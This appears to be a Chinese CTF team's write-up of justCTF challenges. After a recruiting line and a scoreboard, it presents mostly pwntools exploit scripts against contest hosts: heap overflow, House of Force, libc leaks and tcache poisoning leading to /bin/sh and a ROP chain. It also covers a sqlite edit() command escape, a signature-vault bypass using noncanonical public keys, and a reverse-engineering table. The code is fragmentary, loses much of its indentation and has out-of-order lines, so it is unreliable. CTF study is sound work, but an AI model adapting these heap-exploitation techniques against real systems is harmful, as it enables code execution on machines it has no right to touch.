[email protected](带上简历和想加入的小组)
排名 | 队伍 | 总分 |
11 | CzechCyberTeam | 3032 |
12 | ARESx | 2845 |
13 | FluxFingers | 2320 |
14 | DiceGang | 2307 |
15 | VP-Union | 2291 |
16 | LosFuzzys | 2112 |
17 | rmrfslash | 1800 |
18 | 0Tolerance | 1791 |
19 | Kalmarunionen | 1786 |
20 | ./Vespiary | 1771 |
House of Force
#!/usr/bin/env python3
# -*- coding:utf-8 -*-from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')
sh = remote('house.nc.jctf.pro', 1337)
sh.sendlineafter(b'>> ', b'1')
sh.sendlineafter(b': ', b'xmcve')
sh.sendlineafter(b': ', b'root'.ljust(0x18, b'\0') + b'\xff' * 8)
sh.sendlineafter(b': ', str(-152))
sh.sendlineafter(b'>> ', b'2')
The decompress
function contains a heap overflow vulnerability. For example, while decompressing $1024a
#!/usr/bin/env python3
# -*- coding:utf-8 -*-from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')
sh = remote('nucleus.nc.jctf.pro', 1337)
sh.sendlineafter(b'> ', b'2')
sh.sendlineafter(b': ', b'ab' * 0x1f0)
sh.sendlineafter(b'> ', b'2')
sh.sendlineafter(b': ', b'ab')
sh.sendlineafter(b'> ', b'2')
sh.sendlineafter(b': ', b'ab')
sh.sendlineafter(b'> ', b'3')
sh.sendlineafter(b': ', b'd')
sh.sendlineafter(b': ', b'0')
sh.sendlineafter(b'> ', b'5')
sh.sendlineafter(b': ', b'-1024')
sh.recvuntil(b'content: ')
libc_addr = u64(sh.recvn(6) + b'\0\0') - 0x1ecbe0
success('libc_addr: ' + hex(libc_addr))
sh.sendlineafter(b'> ', b'3')
sh.sendlineafter(b': ', b'd')
sh.sendlineafter(b': ', b'2')
sh.sendlineafter(b'> ', b'3')
sh.sendlineafter(b': ', b'd')
sh.sendlineafter(b': ', b'1')
sh.sendlineafter(b'> ', b'2')
sh.sendlineafter(b': ', (b'$2000a' + p64(libc_addr + 0x1eee48)).ljust(0x1f0 * 2, b'\0'))
sh.sendlineafter(b'> ', b'2')
sh.sendlineafter(b': ', b'/bin/sh')
sh.sendlineafter(b'> ', b'2')
sh.sendlineafter(b': ', p64(libc_addr + 0x52290))
sh.sendlineafter(b'> ', b'3')
sh.sendlineafter(b': ', b'd')
sh.sendlineafter(b': ', b'1')
There is a heap overflow vulnerability in the sub_14DF
function. Although we can allocate up to 0x400 memory, there is no length check at v4[len] = 0;
// sub_14DF
_BYTE *__fastcall print_and_malloc(const char *msg, unsigned int len)
int v2; // ebp
_BYTE *v3; // rax
_BYTE *v4; // r14
_BYTE *v5; // rbx
_BYTE *v6; // rbp
char buf; // [rsp+7h] [rbp-31h] BYREF
unsigned __int64 v9; // [rsp+8h] [rbp-30h] v9 = __readfsqword(0x28u);
__printf_chk(1LL, "%s", msg);
v2 = 1024;
if ( len <= 0x400 )
v2 = len;
v3 = malloc(v2);
v4 = v3;
if ( v2 > 0 )
v5 = v3;
v6 = &v3[v2];
if ( !read(0, &buf, 1uLL) )
if ( !buf )
*v5++ = buf;
while ( v5 != v6 );
v4[len] = 0; // heap overflow
return v4;
The primary challenge lies in determining how to disclose the address information. We can allocate memory without the need for edit
, allowing us to use the print
command to extract the information.
void __fastcall create()
v3 = print_and_malloc("contents: ", v2);
v4 = creat(file_path, 0600u);
if ( v4 < 0 )
v5 = strlen(v3);
if ( write(v4, v3, v5) < 0 ) // leak
if ( close(v4) < 0 )
__printf_chk(1LL, "Data saved to: %s\n", file_path);
#!/usr/bin/env python3
# -*- coding:utf-8 -*-from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')
def create(f_len, f, c_len, c):
sh.sendlineafter(b'> ', b'0')
sh.sendlineafter(b'size: ', str(f_len).encode())
sh.sendafter(b'fname: ', f)
sh.sendlineafter(b'len: ', str(c_len).encode())
sh.sendafter(b'contents: ', c)
def show(f_len, f):
sh.sendlineafter(b'> ', b'2')
sh.sendlineafter(b'size: ', str(f_len).encode())
sh.sendafter(b'fname: ', f)
sh = remote('mysterylocker.nc.jctf.pro', 1337)
salt = str(randint(0, 0x100000000)).encode()
create(0x400, salt + b'\0', 0x400, b'\0')
create(0x400, salt + b'1\0', 0x400, b'\0')
show(0x400, salt + b'1\0')
heap_addr = u64(sh.recvn(5) + b'\0\0\0') << 12
success('heap_addr: ' + hex(heap_addr))
heap_0x100_0 = heap_addr + 0xb10
heap_0x100_1 = heap_addr + 0xc10
heap_0x50_0 = heap_addr + 0xd10
heap_func_0 = heap_addr + 0x2a0
heap_0x100_content = (heap_0x100_0 >> 12) ^ heap_0x100_1
success('heap_0x100_1_fake: ' + hex(heap_0x100_1_fake))
heap_0x100_1_fake = (heap_0x100_content & (~0xff)) ^ (heap_0x100_0 >> 12)
if (heap_0x100_1_fake % 0x10) == 0 and heap_0x100_1_fake > heap_0x100_1:
success('heap_0x100_1: ' + hex(heap_0x100_1))
success('heap_0x100_1_fake: ' + hex(heap_0x100_1_fake))
create(0xf0, salt + b'2\0', 0xf0, b' ' * (heap_0x100_1_fake - heap_0x100_1 - 8) + p16(0x111) + b'\0')
create(0x840, salt + b'3\0', 0xf0, b'\0')
create(0x40, salt + b'4\0', 0x40, b'\0')
create(0xf0, salt + b'5\0', 0xf0, b' ' * (heap_0x50_0 - heap_0x100_1_fake - 8) + p8(0x51) + b' ' + p64((heap_0x50_0 >> 12) ^ heap_func_0)[:6] + b'\0')
create(0xa39, salt + b'6\0', 0xf0, b'\0')
create(0xa3a, salt + b'7\0', 0xf0, b'\0')
create(0xa3b, salt + b'8\0', 0xf0, b'\0')
create(0xa3c, salt + b'9\0', 0xf0, b'\0')
create(0xa3d, salt + b'10\0', 0xf0, b'\0')
create(0xa3e, salt + b'11\0', 0xf0, b'\0')
create(0xa3f, salt + b'12\0', 0xf0, b'\0')
create(0x40, salt + b'13\0', 0x40, b'\0')
show(0x400, salt + b'13\0')
image_addr = u64(sh.recvn(6) + b'\0\0') - 0x1db4
success('image_addr: ' + hex(image_addr))
create(0x240, salt + b'14\0', 0x240, b'\0')
create(0x260, salt + b'15\0', 0x260, b'\0')
create(0x400, salt + b'16\0', 0x100, b' ' * (heap_0x50_0 - heap_0x100_1_fake - 8) + p16(0x7b1) + b'\0')
create(0x400, salt + b'17\0', 0x40, b'\0')
create(0x400, salt + b'18\0', 0x40, b'\0')
show(0x400, salt + b'18\0')
libc_addr = u64(sh.recvn(6) + b'\0\0') - 0x1f71b0
success('libc_addr: ' + hex(libc_addr))
create(0x400, salt + b'19\0', 0x20, b' ' * 0x10 + p64(libc_addr + 0x79f30)[:6] + b'\0')
sh.sendlineafter(b'> ', b'2')
sh.sendline(b'\0' * 0x528 + p64(libc_addr + 0x0000000000022fd9) + p64(libc_addr + 0x00000000000240e5) + p64(libc_addr + 0x1b51d2) + p64(libc_addr + 0x4ebf0))
The sqlite3 service disables most internal commands, including .shell
. While searching the references of the system
function, its occurrence is not limited to just .shell
, but also found in the editFunc
function. Upon exploring the context of the editFunc
function, you will discover that it is originates from the internal edit
function in sqlite3.
sqlite> select edit('', '/jailed/readflag');
Same as notabug
sqlite> select edit('', '/jailed/readflag');
from coincurve import PublicKey
import jsonFLAG = 'justWTF{th15M1ghtB34(0Rr3CtFl4G!Right????!?!?!??!!1!??1?}'
PUBKEYS = ['025056d8e3ae5269577328cb2210bdaa1cf3f076222fcf7222b5578af846685103',
class FlagVault:
def __init__(self, flag):
self.flag = flag
self.pubkeys = []
def get_keys(self, _data):
return str([pk.format().hex() for pk in self.pubkeys])
def enroll(self, data):
if len(self.pubkeys) > 3:
raise Exception("Vault public keys are full")
pk = PublicKey(bytes.fromhex(data['pubkey']))
return f"Success. There are {len(self.pubkeys)} enrolled"
def get_flag(self, data):
# Deduplicate pubkeys
auths = {bytes.fromhex(pk): bytes.fromhex(s) for (pk, s) in zip(data['pubkeys'], data['signatures'])}
if len(auths) < 3:
raise Exception("Too few signatures")
if not all(PublicKey(pk) in self.pubkeys for pk in auths):
raise Exception("Public key is not authorized")
if not all(PublicKey(pk).verify(s, b'get_flag') for pk, s in auths.items()):
raise Exception("Signature is invalid")
return self.flag
def write(data):
def read():
return json.loads(input())
except EOFError:
Welcome to the vault! Thank you for agreeing to hold on to one of our backup keys.The vault requires 3 of 4 keys to open. Please enroll your public key.
if __name__ == "__main__":
vault = FlagVault(FLAG)
for pubkey in PUBKEYS:
vault.enroll({'pubkey': pubkey})
write({'message': WELCOME})
while True:
data = read()
if data['method'] == 'get_keys':
write({'message': vault.get_keys(data)})
elif data['method'] == 'enroll':
write({'message': vault.enroll(data)})
elif data['method'] == "get_flag":
write({'message': vault.get_flag(data)})
write({'error': 'invalid method'})
except Exception as e:
write({'error': repr(e)})
值得指出,虽然在enroll(self, data)
def enroll(self, data):
if len(self.pubkeys) > 3:
raise Exception("Vault public keys are full")
其中,生成一组公私钥以及对应签名,参考老技術者がイーサリアムアドレス・公開鍵を秘密鍵から生成してみた話 - Qiita
import json
from pwn import *
from coincurve import PublicKey, keys, PrivateKeycontext.log_level = 'debug'
def write(data):
return json.dumps(data)
sh = remote('vaulted.nc.jctf.pro', 1337)
t = write({'method': 'get_keys'})
# 塞入新建公钥
private_key_hex = 'f8f8a2f43c8376ccb0871305060d7b27b0554d2cc72bccf41b2705608452f315'
private_key = bytes.fromhex(private_key_hex)
public_key = PublicKey.from_valid_secret(private_key).format(compressed=False)
public_key_hex = public_key.hex()
t = write({'method': 'enroll', 'pubkey': public_key_hex})
# 利用公钥解析的三种格式完成挑战
ps = [PublicKey.from_valid_secret(private_key).format(compressed=False).hex(),
'06' + PublicKey.from_valid_secret(private_key).format(compressed=False).hex()[2:]]
s = PrivateKey(private_key).sign(b'get_flag').hex()
t = write({'method': 'get_flag', 'pubkeys': ps, 'signatures': [s for _ in range(3)]})
# justCTF{n0nc4n0n1c4l_72037872768289199286663281818929329}
from pwn import *
while True:
conn = remote("eccfordummies.nc.jctf.pro",1337)
for i in range(8):
conn.sendline(" ".encode())
conn.sendline("0 1 1 1 0".encode())
arm rust
The main logical pseudocode is generated after manually pacth partial bytes.
The input string gets the index value of each character on a character set.
v4 = [0]*64
v4[37] = 7
v4[41] = 28
v4[42] = 255
v4[24] = 3
v4[38] = 33
v4[25] = 26
v4[26] = 17
v4[27] = 20
v4[32] = 17
v4[33] = 17
v4[29] = 19
v4[30] = 1
v4[31] = 32
v4[19] = 8
v4[40] = 11
v4[39] = 11
v4[17] = 11
v4[23] = 11
v4[8] = 21
v4[9] = 51
v4[34] = 24
v4[16] = 15
v4[10] = 26
v4[11] = 9
v4[12] = 20
v4[13] = 18
v4[3] = 5
v4[28] = 34
v4[4] = 27
v4[5] = 13
v4[6] = 29
v4[35] = 26
v4[21] = 26
v4[15] = 26
v4[7] = 26
v4[36] = 2
v4[18] = 0
v4[20] = 13
v4[22] = 29
v4[14] = 19
v4[0] = 9
v4[1] = 2
v4[2] = 19
xxx = b"abcdefghijklmnopqrstuvwxyz_{}0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
for i in v4:
- END -